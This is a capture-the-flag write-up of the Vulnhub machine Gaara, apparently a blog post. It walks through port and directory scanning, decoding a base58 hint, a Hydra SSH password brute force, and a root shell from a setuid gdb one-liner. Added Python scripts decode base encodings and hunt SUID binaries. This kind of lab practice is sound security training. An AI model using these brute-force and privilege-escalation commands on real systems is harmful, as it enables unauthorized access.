# Gaara 1: BOOT2ROOT CTF VULNHUB WRITEUP

Hello everyone! Welcome to my second Capture-the-Flag writeup. My first one was on **PWN THE TRON**, a great machine for practicing. If you’re interested, you can check it out [here](https://medium.com/@kura1yum3/pwn-the-tron-boot2root-ctf-vulnhub-590974e79c9d). Now, let’s dive into a new challenge, **Gaara** from Vulnhub. From what I’ve gathered, this is an easy machine to tackle. Let’s get started!

**1. Reconnaissance**

Let’s determine the IP of our target first:

<figure><img src="https://cdn-images-1.medium.com/max/800/1*qJmWkWO3IWo0bT5TSPT88A.png" alt=""><figcaption><p>This is the IP of our target.</p></figcaption></figure>

Now that we know the target’s address, let’s use **Nmap** to scan it for open ports that could serve as entry points. `-A` turns on OS detection, version detection, script scanning and traceroute (so `-sV` is already implied), `-p-` covers all 65535 TCP ports, and `-T4` speeds up the timing.

*`nmap -A -sV -p- -T4 -v 192.168.43.140`*

<figure><img src="https://cdn-images-1.medium.com/max/800/1*I8Eo7pyldRlUXeaxUS3q-w.png" alt=""><figcaption><p>As you can see, only two ports are open: 22 (SSH) and 80 (HTTP)</p></figcaption></figure>

**2. Enumeration**

Let’s take a quick look at the interface of our target

<figure><img src="https://cdn-images-1.medium.com/max/800/1*_NEi1KYkaNGosjbEg5UG5w.png" alt=""><figcaption><p>Not a fan of Naruto xD</p></figcaption></figure>

Next, let’s enumerate the web server’s directories and files, looking for anything that exposes sensitive data, a misconfiguration, or a hidden resource we can use as a foothold. We’ll use **Gobuster** for this; `-x html,php,txt` also tries each word with those extensions, and `-t 64` runs 64 threads.

*`gobuster dir -u http://192.168.43.140/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt -t 64`*

<figure><img src="https://cdn-images-1.medium.com/max/800/1*xqat7w1787fzb5GCPOxxdQ.png" alt=""><figcaption></figcaption></figure>

Once the enumeration finished, one directory, **/Cryoserver**, caught my attention. At first glance it looked worthless, but the page is longer than it appears: scrolling to the very bottom revealed three additional subdirectories hidden there.

<figure><img src="https://cdn-images-1.medium.com/max/800/1*_Rd8E0_v2dSfEauI3YN_ag.png" alt=""><figcaption><p>Temari, Kazekage, and iamGaara</p></figcaption></figure>

I dug through all of them, and they contain nothing but wiki-style storyline text. What’s interesting is that the storyline is identical across all three directories, which is a strong hint that something is hidden inside one of them. After carefully reading through **iamGaara**, I found this string:

<figure><img src="https://cdn-images-1.medium.com/max/800/1*T72WBnAyYDKOeC9Tmpc7MA.png" alt=""><figcaption><p>Some sort of encoding</p></figcaption></figure>

The string looked encoded, so I launched my own decoder tool, Kudo, which handles the family of base encodings. If you’re curious, you can check out my tool [here](https://github.com/Kuraiyume/Kudo). I went through all the base encodings and discovered that the string was base58. A useful tell for base58: its alphabet omits the visually ambiguous characters 0, O, I and l and it uses no `=` padding, so a mixed-case string with digits, none of those four characters and no trailing padding is a good candidate.

<figure><img src="https://cdn-images-1.medium.com/max/800/1*zsFHHSSRRFw8hWtfalO3VQ.png" alt=""><figcaption></figcaption></figure>
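As an added example (my own code, not Kudo and not part of the original writeup), here is a small Python base58 decoder alongside a helper that tries the common base encodings and keeps only the results that decode to readable text, which is essentially the triage done above. The encoded sample is constructed by base58-encoding the writeup’s recovered plaintext `gaara:ismyname`, since the original encoded string is only visible in the screenshot.

```python
import base64
import string

# Bitcoin-style base58 alphabet: no 0, O, I or l, and no padding character.
B58_ALPHABET = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(text: str) -> bytes:
    """Decode a base58 string; each leading '1' maps to a leading 0x00 byte."""
    n = 0
    for ch in text.encode():
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"invalid base58 character {chr(ch)!r}")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeros + body


def b58encode(data: bytes) -> str:
    """Inverse of b58decode, used here only to build the constructed sample."""
    n = int.from_bytes(data, "big")
    digits = bytearray()
    while n:
        n, rem = divmod(n, 58)
        digits.append(B58_ALPHABET[rem])
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return (b"1" * leading_zeros + bytes(reversed(digits))).decode()


def looks_like_text(data: bytes) -> bool:
    """Cheap filter: non-empty and every byte is printable ASCII or whitespace."""
    printable = set(string.printable.encode())
    return bool(data) and all(b in printable for b in data)


# Strict decoders: each raises ValueError (binascii.Error is a subclass) on bad input.
DECODERS = {
    "base16": lambda s: base64.b16decode(s, casefold=True),
    "base32": lambda s: base64.b32decode(s, casefold=True),
    "base58": b58decode,
    "base64": lambda s: base64.b64decode(s, validate=True),
    "base64url": base64.urlsafe_b64decode,
    "base85": base64.b85decode,
    "ascii85": base64.a85decode,
}


def try_all(text: str) -> dict:
    """Return {encoding: plaintext} for every decoder that yields readable text."""
    hits = {}
    for name, decode in DECODERS.items():
        try:
            out = decode(text.strip())
        except ValueError:
            continue  # not valid in this encoding, move on
        if looks_like_text(out):
            hits[name] = out
    return hits


if __name__ == "__main__":
    # Constructed sample: the writeup's plaintext, base58-encoded by us.
    sample = b58encode(b"gaara:ismyname")
    print("encoded:", sample)
    for enc, plain in try_all(sample).items():
        print(f"{enc:9s} -> {plain!r}")
```

Because base64 and base58 strings overlap in alphabet, more than one decoder may succeed on a given input; the printable-text filter is what separates a real hit from noise, and anything that survives it still deserves a human look.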

**3. Exploitation**

The plaintext reveals **gaara:ismyname**, a strong hint that **gaara** is a local username. With a username in hand, we can brute-force the password. Remember, the port scan showed SSH open, so that is where we’ll try, and Hydra will be our tool of choice.

*`hydra -l gaara -P /usr/share/wordlists/rockyou.txt 192.168.43.140 ssh -t 64 -VVV`*

One caveat: Hydra itself warns that many SSH servers limit parallel connections, and with `-t 64` some attempts can be dropped and a correct password silently missed. If the run looks flaky, rerun with `-t 4`.

<figure><img src="https://cdn-images-1.medium.com/max/800/1*2XoADvNVP312HSmPBzc5ag.png" alt=""><figcaption><p>The password for user <strong>gaara</strong> is <strong>iloveyou2</strong></p></figcaption></figure>

Now that we have the credentials, let’s log in over SSH as **gaara**.

*`ssh gaara@192.168.43.140`*

<figure><img src="https://cdn-images-1.medium.com/max/800/1*E2UGsFux0NPZpo-7bxvkFA.png" alt=""><figcaption><p>User Flag!</p></figcaption></figure>

We’re in! And we got the user flag.

As you noticed, there’s another file in the home directory, **Kazekage.txt**. Here is its content:

<figure><img src="https://cdn-images-1.medium.com/max/800/1*oioCVHR51AaHZ5fv5ass3A.png" alt=""><figcaption></figcaption></figure>

Probably base64-encoded, right? So I decoded it on the target machine:

*`echo 'base64-encoded-string' | base64 -d`*

<figure><img src="https://cdn-images-1.medium.com/max/800/1*MlX_a25hi4pgS2SL7RDRiA.png" alt=""><figcaption></figcaption></figure>

The plaintext points to the **games** directory. I navigated to it and found a .txt file there. Here’s its content:

<figure><img src="https://cdn-images-1.medium.com/max/800/1*sFrVgDF_AQokjl1iqjthzg.png" alt=""><figcaption></figcaption></figure>

The file contains a Brainfuck program, which we can run with an online interpreter such as this [decoder](https://www.dcode.fr/brainfuck-language?__r=1.f95d2f0e7f432adeee396efdb886f6e5).

<figure><img src="https://cdn-images-1.medium.com/max/800/1*puolwhW_EDHDqU1EZ6NTNQ.png" alt=""><figcaption><p>The result is: You think you could find something that easily? Try harder!</p></figcaption></figure>

**4. Privilege Escalation**

I guess we need to dig deeper here, so I searched the entire filesystem for regular files with the setuid bit set. Such files run with the privileges of their owner (often root) no matter who launches them, which makes them the first thing to check for privilege escalation.

*`find / -type f -perm -04000 2>/dev/null`*

<figure><img src="https://cdn-images-1.medium.com/max/800/1*fwx7H0ZGZHbNXnvcitYDJg.png" alt=""><figcaption></figcaption></figure>

As you can see, these are the SUID binaries on the box, and **gdb** is among them. A setuid gdb is a known privilege escalation, so take a look at GTFOBins for gdb; this is the one-liner: *`gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit`*

This works because gdb embeds a Python interpreter, and that interpreter runs with the effective UID the setuid bit gave us (root). `os.execl` replaces the gdb process with `/bin/sh`, and the `-p` flag asks the shell to keep that effective UID rather than dropping back to the real user (bash, for one, resets the effective UID to the real one on startup unless `-p` is given). `-nx` skips gdb’s init files, and the trailing `-ex quit` just exits cleanly if the exec fails.
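The same SUID hunt as a small Python script, added here as an example (not the author’s tooling and not GTFOBins code): `scan_setuid` reproduces `find / -type f -perm -4000`, and `triage` pulls out the root-owned binaries whose names appear in a short, illustrative subset of the GTFOBins SUID list (assumption: the set below is a hand-picked sample, not the full list). `make_demo_tree` builds a constructed throwaway directory containing a fake setuid `gdb`, so the scan can be exercised without root; the real run is `scan_setuid("/")`.

```python
import os
import stat
import tempfile

# Illustrative subset of binaries that have a SUID entry on GTFOBins (assumption: not exhaustive).
GTFOBINS_SUID = {
    "gdb", "find", "vim", "vi", "python", "python3", "perl", "php",
    "bash", "env", "nmap", "cp", "mv", "less", "more", "awk", "gawk",
}

# Pseudo filesystems: slow to walk and never hold real setuid binaries.
PRUNE = {"/proc", "/sys", "/dev", "/run"}


def scan_setuid(root="/"):
    """Equivalent of `find root -type f -perm -4000`: regular files with the setuid bit."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PRUNE]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append({
                    "path": path,
                    "owner_uid": st.st_uid,
                    "mode": stat.S_IMODE(st.st_mode),
                })
    return found


def triage(entries):
    """Split results into root-owned GTFOBins candidates and everything else."""
    candidates, others = [], []
    for entry in entries:
        base = os.path.basename(entry["path"])
        if entry["owner_uid"] == 0 and base in GTFOBINS_SUID:
            candidates.append(entry)
        else:
            others.append(entry)
    return candidates, others


def make_demo_tree():
    """Constructed sample: a temp tree with a setuid 'gdb' and a normal 'ls'."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("gdb", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)  # owner may set the setuid bit on their own file
    return root


if __name__ == "__main__":
    hits = scan_setuid("/")
    candidates, others = triage(hits)
    print("Root-owned GTFOBins candidates:")
    for e in candidates:
        print(f"  {e['mode']:04o} uid={e['owner_uid']} {e['path']}")
    print(f"{len(others)} other setuid files found")
```

A hit in `candidates` is a lead, not a guarantee: a hardening measure such as a `nosuid` mount or a binary that drops privileges itself will still show up here, so confirm by running the GTFOBins one-liner and checking `id`.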

<figure><img src="https://cdn-images-1.medium.com/max/800/1*eHNL9OLtsalD78zZkFjFuQ.png" alt=""><figcaption></figcaption></figure>

It works! We have a root shell.

This is the Final Flag:

<figure><img src="https://cdn-images-1.medium.com/max/800/1*QrDWm3cmL5RaBkAmZCIvHg.png" alt=""><figcaption></figcaption></figure>

We’ve successfully completed Gaara!!

**Conclusion**

Gaara is an easy machine to tackle, but it still requires players to analyze carefully. While it may seem straightforward, it challenges users to think critically and explore different techniques, such as encoding, file analysis, and privilege escalation. The machine reinforces the importance of attention to detail and persistence in uncovering hidden vulnerabilities, making it a great learning experience for those looking to sharpen their hacking skills.
